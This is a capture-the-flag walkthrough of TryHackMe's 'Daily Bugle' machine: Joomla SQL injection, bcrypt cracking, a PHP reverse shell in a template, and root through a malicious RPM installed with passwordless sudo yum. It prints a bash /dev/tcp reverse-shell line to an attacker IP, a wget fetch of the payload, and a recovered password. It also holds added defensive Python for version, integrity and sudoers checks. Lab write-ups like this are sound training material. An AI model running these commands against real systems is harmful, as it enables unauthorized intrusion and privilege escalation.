Today, we will root the Daily Bugle Machine from TryHackMe.
After deploying the machine, we are greeted with the first question:
Access the Server, Who robbed the bank?
Pretty straightforward. The answer is right there on the site.
The next question tells us the CMS is Joomla, and we need to find its version.
After a Google search, I ended up here.
So we can read the version by visiting:
http://10.10.249.33/administrator/manifests/files/joomla.xml
We got the version too.
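The manifest above is readable by anyone, so a defender should know what it leaks. The following is an added example, not part of the original walkthrough: it parses a joomla.xml manifest and compares the version it reports with a patched baseline. The sample manifest and the baseline version "3.7.1" are constructed for illustration and are not values taken from the page.

```python
"""Added example (not from the original writeup): read the version a Joomla
install leaks through administrator/manifests/files/joomla.xml and compare it
with the release you consider patched."""
import re
import xml.etree.ElementTree as ET
from typing import Optional, Tuple

# Constructed sample of the manifest's shape; the real file has more elements.
SAMPLE_MANIFEST = """<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>3.7.0</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

# Constructed baseline: the version you consider patched for your install.
PATCHED_BASELINE = "3.7.1"


def manifest_version(xml_text: str) -> Optional[str]:
    """Return the text of the <version> element, or None if absent or malformed."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    node = root.find("version")
    if node is None or not node.text:
        return None
    return node.text.strip()


def parse_version(text: str) -> Tuple[int, ...]:
    """'3.7.0' -> (3, 7, 0); tolerates suffixes such as '3.9.27-rc1'."""
    match = re.match(r"(\d+(?:\.\d+)*)", text)
    if not match:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def is_outdated(found: str, patched: str = PATCHED_BASELINE) -> bool:
    """True when the reported version is older than the patched baseline."""
    return parse_version(found) < parse_version(patched)


if __name__ == "__main__":
    found = manifest_version(SAMPLE_MANIFEST)
    print(f"manifest reports {found}; outdated: {is_outdated(found)}")
```

Run this against a copy of your own site's manifest as part of patch inventory; the same check also tells you whether the file is reachable from the outside, which is worth blocking at the web server regardless of version.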
This version of Joomla has an SQL injection vulnerability. Let's look it up:
https://www.exploit-db.com/exploits/42033
We could use sqlmap, but a simpler Python script is available:
https://github.com/XiphosResearch/exploits/tree/master/Joomblah
Let's run it against our target.
kali@kali:~/ex$ python joomblah.py http://10.10.249.33
We got the admin password hashes!
Let's crack them with John:
root@kali:/home/kali/ex# john -w=/usr/share/wordlists/rockyou.txt jonah.txt -form=bcrypt
It took 40 minutes to get the hash cracked in my VM; bcrypt is deliberately expensive to compute, so even a wordlist attack takes a while.
Let's log in now at
http://10.10.249.33/administrator/
with the password we just found.
Once we are inside, go to Templates > Templates and click the name of the active template.
Select the index.php file and paste in the PHP reverse shell script. Download the file from here and update it with our IP:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Now listen on port 4444 on our machine and load the main page of the site.
kali@kali:~/ex$ nc -nlvp 4444
listening on [any] 4444 ...
We got a reverse shell!
Let's find the user flag now. First, list the users:
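The foothold above came from editing a template's index.php through the admin panel, which is exactly the kind of change a file-integrity baseline catches. The following is an added example, not code from the original writeup: it hashes every file under a templates directory, then diffs a later snapshot against the baseline. The directory layout and file contents are constructed in a temporary folder, and the "tampered" index.php holds a placeholder comment, not a shell.

```python
"""Added example (not from the original writeup): minimal file-integrity
check for a Joomla templates tree, so an edited index.php shows up as a
changed SHA-256 digest."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def hash_tree(root: Path) -> Dict[str, str]:
    """Map each file's path (relative to root, POSIX form) to its SHA-256 hex digest."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_baseline(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify files as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> Dict[str, List[str]]:
    """Build a constructed template tree, baseline it, then simulate the tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        tpl = root / "templates" / "protostar"  # constructed template name
        tpl.mkdir(parents=True)
        (tpl / "index.php").write_text("<?php defined('_JEXEC') or die; ?>\n")
        (tpl / "templateDetails.xml").write_text("<extension/>\n")
        baseline = hash_tree(root)

        # Simulate the edit made through the template editor. The content is a
        # placeholder comment, not a working shell.
        (tpl / "index.php").write_text("<?php /* injected code would appear here */ ?>\n")
        (tpl / "extra.php").write_text("<?php ?>\n")
        return diff_baseline(baseline, hash_tree(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In practice the baseline is taken right after deployment and stored outside the web root, and the comparison runs on a schedule. Making the templates directory read-only for the web server account removes the in-browser template editor as a write path altogether.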
sh-4.2$ cat /etc/passwd
Let's have a look at jjameson's home directory.
But we don't have permission for that.
Let's find another way.
Have a look at the /var/www/html/configuration.php file.
Let's try this database password for the user.
bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu
[jjameson@dailybugle html]$
Success!
The user can run yum as root without a password on this machine.
We can read the user flag now.
We can install any package with yum as the root user. Have a look at the following page:
https://gtfobins.github.io/gtfobins/yum/
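A passwordless sudo rule for a package manager is the root cause of the escalation that follows, and it is easy to audit for. The following is an added example, not from the original writeup: it scans sudoers-style rules and flags commands that grant a binary with known shell-escape or arbitrary-write capability, rating NOPASSWD grants higher. The sample rules and the short watch list are constructed; GTFOBins, linked above, is the fuller reference for the list.

```python
"""Added example (not from the original writeup): flag sudoers rules that
hand out shell-capable binaries, especially with NOPASSWD."""
import re
from typing import Dict, List

# Constructed short watch list of binaries that can spawn a shell or write
# arbitrary files when run as root (yum is the one used in this writeup).
SHELL_CAPABLE = {
    "yum", "dnf", "rpm", "apt", "apt-get", "pip",
    "vi", "vim", "less", "more", "find", "bash", "sh", "python", "perl",
}

# Constructed sample of /etc/sudoers content, including a rule of the kind
# that lets jjameson run yum without a password.
SAMPLE_SUDOERS = """\
Defaults    env_reset
root    ALL=(ALL)       ALL
%wheel  ALL=(ALL)       ALL
jjameson ALL=(ALL) NOPASSWD: /usr/bin/yum
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart httpd
ops      ALL=(ALL) /usr/bin/less   # comment after the rule
"""

# user host=(runas[:group]) [TAG: ...] command[, command...]
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def audit(sudoers_text: str) -> List[Dict[str, object]]:
    """Return one finding per command that names a shell-capable binary."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("Defaults"):
            continue
        match = RULE.match(line)
        if not match:
            continue  # aliases, includes and other directives are out of scope here
        nopasswd = "NOPASSWD" in match.group("tags")
        for cmd in match.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd == "ALL":
                continue  # full sudo is a separate, obvious finding
            exe = cmd.split()[0].rsplit("/", 1)[-1]
            if exe in SHELL_CAPABLE:
                findings.append({
                    "user": match.group("user"),
                    "command": cmd,
                    "nopasswd": nopasswd,
                    "severity": "high" if nopasswd else "medium",
                })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS):
        print(finding)
```

This parser covers plain user specifications only; real sudoers files also use aliases and #include directives, so run it over the expanded output of `sudo -l -U <user>` as well. Remediation is to drop the rule or restrict it to a specific repository-only subcommand, never to `yum` as a whole.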
Let us create a specially crafted RPM package and install it on the target.
Let's follow this guide for the process.
root@kali:/home/kali/ex# git clone https://github.com/jordansissel/fpm
root@kali:/home/kali/ex/fpm# gem install fpm
root@kali:/home/kali/ex/fpm# apt-get install rpm
Now create a file named root.sh for the reverse shell:
#! /bin/bash
bash -i >& /dev/tcp/10.9.42.115/9999 0>&1
Now create the RPM package:
root@kali:/home/kali/ex# fpm -n root -s dir -t rpm -a all --before-install root.sh /home/kali/ex
Now let's transfer the file to the target machine and install the package.
root@kali:/home/kali/ex# python -m SimpleHTTPServer 222
and on the target:
[jjameson@dailybugle ~]$ wget http://10.9.42.115:222/root-1.0-1.noarch.rpm
Listen for a connection on port 9999 on our attacker machine:
root@kali:/home/kali/ex# nc -nlvp 9999
listening on [any] 9999 ...
and install the package on the target:
[jjameson@dailybugle ~]$ sudo yum localinstall -y root-1.0-1.noarch.rpm
We got the root shell!
Let's read the root flag now.
Done!